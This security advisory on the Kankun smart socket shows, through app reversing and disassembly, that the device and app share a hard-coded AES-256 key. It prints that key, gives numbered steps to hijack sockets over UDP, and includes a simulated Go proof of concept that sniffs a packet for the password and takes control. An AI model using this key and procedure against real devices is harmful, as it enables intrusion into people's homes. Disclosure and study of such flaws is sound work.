Konke mini k

Vulnerability: Hard-coded AES 256-bit key used in the Kankun smart socket and its mobile app.

Introduction:
The Internet of Things (IoT) space is very interesting as it encompasses hardware, mobile and cloud/web. It is a very good mix of technologies to hack around with, where you can sharpen your software as well as hardware exploitation skills, not to mention that exploiting IoT/smart devices. In good faith we would like to mention the same person, who goes by the handle kankun hacker (https plus).

Vulnerability Description:
The Kankun smart socket device and the mobile app use a hard-coded AES 256-bit key to encrypt the commands and responses exchanged between the device and the app. The commands are broadcast on the network to UDP destination port 27431, which means anyone on the local network can sniff the command packets and, because the key is the same in every app and device, decrypt them. An attacker on the local network can also use the same key to encrypt and send unsolicited commands to the device and hijack it.

Technical details:
We performed our analysis on the Android app and the device. The manufacturer of the device is www. The user manual specifies the app to be used for the device: http kk

Apk:
The smart socket has a newer version of the app on the Google Play store, which is also vulnerable: https play

App Reversing:
We decompiled the app using apktool. The app has a native shared library, libNDK_03.so, which contains the encryption logic and the hard-coded key. So we had a starting point and went straight after the encryption; below is the result.

A quick look at the IDA output shows that EncryptData and DecryptData are exported functions, which means any native program can load libNDK_03 using dlopen and family and call them directly. Interestingly, there is also a function called add which adds its two parameters and returns the result.

A quick strings output showed up the key along with other strings:

    BBh0
    pointer is null
    pucOutputData too small
    fdsl;mewrjope456fds4fbvfnjwaugfo
    pucInputData
    dataLen is incorrect
    pucOutPutData is too small

The string fdsl;mewrjope456fds4fbvfnjwaugfo is 32 bytes long, i.e. exactly the 256 bits of an AES-256 key. EncryptData internally calls the aes functions, which confirms that it is using AES:

    000037d8 <EncryptData>:
        37d8:   b5f0        push    {r4, r5, r6, r7, lr}
        37da:   465f        mov     r7, fp
        37dc:   ...
        38be:   1c29        adds    r1, r5, #0
        38c0:   f7fd fd84   bl      13cc <aes_encrypt>

Now, to find the key we look at the code of EncryptData. The instructions below generate the memory address of the key string within the library:

        3842:   4b4e        ldr     r3, [pc, #312]   ; (397c <EncryptData+0x1a4>)
        ...
        384a:   447b        add     r3, pc
        ...
        397c:   0000 3e96   muleq   r0, r6, lr

Let's look at the code. The ldr instruction loads into r3 the value at address 0x397c, which is 0x3e96 (the entry at 397c is a literal pool word, not code; objdump merely decodes those bytes as muleq). Because of pipelining and THUMB mode, while the add r3, pc instruction executes, pc points 4 bytes ahead of its own address 0x384a, i.e. at 0x384e. In effect r3 = 0x3e96 + 0x384e + 0x28 = 0x770c, which is where our key resides.

At the call site, the instructions below translate to r2 = 128, left shifted, and r3 = 128, before EncryptData is called:

                2280        movs    r2, #128   ; 0x80
        39b6:   2380        movs    r3, #128   ; 0x80
        39b8:   f7ff ff0e   bl      37d8 <EncryptData>

Device binaries:
There are two binaries on the device that use the key, kkeps_off and kkeps_on. The output of strings on kkeps_off shows the same key.

Communication protocol:
We previously saw that the app sends the commands as UDP broadcasts to port 27431. If the user does not set any encryption password, the string nopassword is used in its place. The command and response for switching ON and OFF is a 4-step process:

Step 1: The app broadcasts the encrypted ON/OFF request.
Step 2: The device responds with a confirmation ID.
Step 3: The app sends the confirmation request carrying that ID.
Step 4: The device sends an acknowledgement and switches ON/OFF.

An example of the communication protocol to switch ON the device, assuming the MAC address of the device is de:ad:de:ad:de:ad, the password set by the user is secretpass and the ...

There is also an option of wan_phone and wan_device which we did not test.

So all you need to do is:
1. nmap scan for UDP port 27431 on the network.
2. When you find the device, note down its MAC address to be used in the request.
3. Send the encrypted request to the device.
4. Extract the confirmation ID from the response.
5. Send the confirmation request to the device.
6. Receive the acknowledgement response. The device has been successfully hijacked.

What if the user sets a password :O
Anyone on the local network can sniff the command packets and already holds the key, so: decrypt the request received, extract the password, and use it in the steps above.
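To make the PC-relative arithmetic from the EncryptData walkthrough reproducible, here is an added worked example in Go. It is written for this page and is not the author's tooling or anything from the library; it implements the two Thumb rules the walkthrough relies on: a literal load "ldr rX, [pc, #imm]" reads from Align(PC, 4) + imm, and "add rX, pc" sees PC as the instruction address + 4. The instruction addresses, the literal value 0x3e96 at 0x397c and the extra 0x28 are the page's values; the pool map is an assumed stand-in for reading words out of the library file.

```go
package main

import "fmt"

// thumbPC is the value the PC register reads as while a Thumb instruction at
// insnAddr executes: because of pipelining it is the instruction address + 4.
func thumbPC(insnAddr uint32) uint32 { return insnAddr + 4 }

// ldrLiteralAddr returns the address a Thumb "ldr rX, [pc, #imm]" loads from:
// Align(PC, 4) + imm. The word alignment is the part that is easy to miss when
// the instruction itself sits at an address that is only halfword aligned.
func ldrLiteralAddr(insnAddr, imm uint32) uint32 {
	return (thumbPC(insnAddr) &^ 3) + imm
}

// addPC returns the result of a Thumb "add rX, pc" executed at insnAddr.
func addPC(insnAddr, regVal uint32) uint32 {
	return regVal + thumbPC(insnAddr)
}

// resolveKeyAddr follows the three steps from the EncryptData disassembly: read
// the literal pool entry, add the current PC, then apply the final constant
// offset the page uses (0x28). pool is an assumed stand-in for reading words
// out of the library file; ok is false when the pool address is not in it.
func resolveKeyAddr(ldrAddr, ldrImm, addAddr, finalOffset uint32, pool map[uint32]uint32) (uint32, uint32, bool) {
	poolAddr := ldrLiteralAddr(ldrAddr, ldrImm)
	lit, ok := pool[poolAddr]
	if !ok {
		return poolAddr, 0, false
	}
	return poolAddr, addPC(addAddr, lit) + finalOffset, true
}

func main() {
	// Values as they appear in the objdump output on the page.
	pool := map[uint32]uint32{0x397c: 0x3e96}
	poolAddr, keyAddr, ok := resolveKeyAddr(0x3842, 312, 0x384a, 0x28, pool)
	fmt.Printf("literal pool entry at %#x, key string at %#x (resolved=%v)\n", poolAddr, keyAddr, ok)
}
```

Running it reports the pool entry at 0x397c and the key at 0x770c. The alignment rule is why an ldr at 0x3840 and one at 0x3842 both reach the same pool word: PC is 0x3844 and 0x3846 respectively, and both round down to 0x3844 before the 312-byte offset is added.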
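The following added example, written for this page and not the author's or the vendor's code, plays the whole exchange offline in Go: a simulated socket that only acts on packets encrypted under the shared key with its MAC and password (nopassword when none is set), a sniffer that recovers the password from one captured command, and the attacker running steps 1 to 4 to hijack the device. The 32-byte key is the one from the strings output above and de:ad:de:ad:de:ad / secretpass are the page's sample values; everything else is an assumption and is marked as such in the code: the AES block mode and padding (ECB with zero padding, chosen so the example needs only the standard library), the "%"-separated field layout, and the confirmation ID format.

```go
package main

import (
	"crypto/aes"
	"fmt"
	"strings"
)

// Hard-coded AES-256 key as it appears in the strings output of libNDK_03.so
// (32 bytes = 256 bits); every app install and every device shares it.
const hardcodedKey = "fdsl;mewrjope456fds4fbvfnjwaugfo"

// ecb runs AES-256 over data block by block. Assumption: the page states neither
// block mode nor padding; ECB with zero padding keeps this on the standard library.
func ecb(data []byte, encrypt bool) []byte {
	blk, _ := aes.NewCipher([]byte(hardcodedKey)) // key is a valid 32-byte constant
	buf := make([]byte, (len(data)+aes.BlockSize-1)/aes.BlockSize*aes.BlockSize)
	copy(buf, data) // zero padding up to a whole number of blocks
	for i := 0; i < len(buf); i += aes.BlockSize {
		if encrypt {
			blk.Encrypt(buf[i:i+aes.BlockSize], buf[i:i+aes.BlockSize])
		} else {
			blk.Decrypt(buf[i:i+aes.BlockSize], buf[i:i+aes.BlockSize])
		}
	}
	return buf
}

// Assumption: this '%'-separated layout stands in for the real message format,
// which the page does not reproduce: mac % password % action % phase [% id].
func message(mac, password, action, phase string, extra ...string) []byte {
	f := append([]string{mac, password, action, phase}, extra...)
	return ecb([]byte(strings.Join(f, "%")), true)
}

// parse decrypts a packet with the shared key and splits it into fields.
func parse(packet []byte) []string {
	return strings.Split(strings.TrimRight(string(ecb(packet, false)), "\x00"), "%")
}

// socket simulates the device side of the 4-step exchange.
type socket struct {
	mac, password string
	on            bool
	nextID        int
	pending       map[string]string // confirmation ID -> action awaiting step 3
}

func newSocket(mac, password string) *socket {
	if password == "" {
		password = "nopassword" // default when the user sets no encryption password
	}
	return &socket{mac: mac, password: password, pending: map[string]string{}}
}

// handle returns the device's encrypted reply, or nil when the packet is dropped.
// Step 2 answers a request with a confirmation ID; step 4 acknowledges a valid
// confirmation and switches the relay.
func (s *socket) handle(packet []byte) []byte {
	f := parse(packet)
	if len(f) < 4 || f[0] != s.mac || f[1] != s.password {
		return nil // wrong MAC or password (or garbage from a wrong key)
	}
	switch f[3] {
	case "request":
		s.nextID++
		id := fmt.Sprint(s.nextID)
		s.pending[id] = f[2]
		return message(s.mac, s.password, f[2], "confirm", id)
	case "confirm":
		if len(f) < 5 || s.pending[f[4]] == "" {
			return nil // missing, unknown or already used confirmation ID
		}
		action := s.pending[f[4]]
		delete(s.pending, f[4])
		s.on = action == "open"
		return message(s.mac, s.password, action, "ack")
	}
	return nil
}

// recoverPassword is what a sniffer on the LAN does with any captured command:
// decrypt it with the shared key and read the password field.
func recoverPassword(sniffed []byte) string {
	if f := parse(sniffed); len(f) >= 4 {
		return f[1]
	}
	return ""
}

// hijack runs the attacker side of steps 1 to 4 against dev and reports whether
// the device acknowledged the unsolicited command.
func hijack(dev *socket, mac, password, action string) bool {
	f := parse(dev.handle(message(mac, password, action, "request"))) // steps 1-2
	if len(f) < 5 || f[3] != "confirm" {
		return false
	}
	a := parse(dev.handle(message(mac, password, action, "confirm", f[4]))) // steps 3-4
	return len(a) == 4 && a[3] == "ack"
}
```

Usage: create the device with newSocket("de:ad:de:ad:de:ad", "secretpass"), build one packet with message(mac, "secretpass", "open", "request") as a constructed stand-in for a capture of the real app, and hand it to recoverPassword, which returns secretpass because the decryption key is the same one the attacker pulled out of libNDK_03.so. hijack(dev, mac, "secretpass", "close") then completes the request/confirm/ack exchange and leaves the socket off. Note what the password does and does not buy the user: it stops a blind attacker who has not seen any traffic (a wrong password is dropped), but since every command on the LAN carries it under a key everybody has, one sniffed packet is enough.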